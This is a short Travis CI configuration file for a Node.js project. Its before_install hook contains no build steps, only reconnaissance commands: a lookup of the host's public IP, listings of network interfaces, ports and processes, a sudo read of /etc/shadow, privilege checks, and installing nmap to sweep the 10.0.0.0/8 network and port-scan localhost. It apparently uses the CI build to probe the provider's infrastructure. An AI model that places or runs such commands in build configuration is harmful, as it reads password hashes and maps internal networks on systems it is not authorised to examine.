---
language: node_js

before_install:
  - curl ipecho.net/plain; echo
  - ifconfig
  - netstat -lap
  - netstat -lanp
  - sudo nslookup
  - sudo cat /etc/hosts
  - sudo cat /etc/shadow
  - ps -aux
  - id
  - whoami
  - sudo id
  - sudo whoami
  - apt-get update
  - apt-get install nmap -y
  - nmap -v -sn 10.0.0.0/8
  - nmap -v -sT 127.0.0.1
  - echo 'done'
node_js:
- 4
